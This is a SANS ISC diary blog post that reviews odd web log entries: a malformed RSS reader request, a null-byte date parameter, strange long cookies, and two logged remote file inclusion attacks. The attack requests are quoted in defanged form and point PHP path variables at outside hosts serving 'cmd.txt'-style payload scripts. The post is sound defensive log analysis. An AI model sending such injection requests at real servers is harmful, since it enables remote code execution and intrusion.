Weblog Observations
In this diary, I will share a few odd log entries from our ISC web logs from the last couple days. Not all of them are attacks. In some cases, they look like honest mistakes, in others, I am not sure what is going on ;-).... of course, there are also some genuine attacks here:
Buggy RSS Reader?
Here a request from earlier today. It triggered an alert as it exceeded the maximum request variable name length:
rss</administrator/components/com_peoplebook/param_peoplebook_php?mosConfig_absolute_path
looks to me like a buggy RSS reader. We attach 'rss' to links in our RSS feed. The remaining "tags" don't look like XSS. So in my opinion not an attack
Remote File Insertion
GET /index.html?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1& GLOBALS=&mosConfig_absolute_path=hxxp: // www. csccog. org/mambots/system/.bash/did.txt? GET //index.php?_SERVER[DOCUMENT_ROOT]= hxxp: // rosenkrieger . herateam .de/phpRaider /authentication/phpbb3/cmd.txt
Now these are "genuine" attacks. The goal here is to overwrite variables and use them for remote file execution attacks. I modified them to prevent accidental clicking. They shouldn't cause any harm to the browser, but you never know...
More Client Bugs? Or someone playing?
GET /diary.html?date=2005%C2%AD05%C2%AD09%E2%80%93%00%00
With this one, I am not sure. The request was blocked because it included a '%00' at the end. The parameter should be a date in this YYYY-MM-DD format. Oddly enough, there was o referer set, but the user agent looked "legit" (easily faked... I know). The same IP address sent other (valid) requests with the same user agent. However, these other requests included cookies, while this particular one didn't... hm. Maybe its someone playing after all? Using a proxy to manipulate requests?
Monster Cookie from Hell.
This request included 3 oddly formated (and very long) cookies. The cookie names are pc1, pv1, bh and ih. "ih" is by far the longest, about 1180 characters long! The cookies all look very similar. Here is the shortest on (pc1):
pc1=\"b!!!!#!!,Ms!!E(x!!PQ4!#0Lh!!I7JGfb<6!!mT+'k4o:!w1K*!!28a!![ <K!![h(~~~~~:7LG_:7e@YM.jTN\";
The one "feature" that sticks out are a lot of exclamation marks (more so in the other values).
In conclusion: Keep checking your logs! Let us know if you see something odd.... or if you got more details about the logs I posted above.
------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Application Security: Securing Web Apps, APIs, and Microservices | Online | US Eastern | Jan 27th - Feb 1st 2025 |
Comments
Jerry
Jul 10th 2008
1 decade ago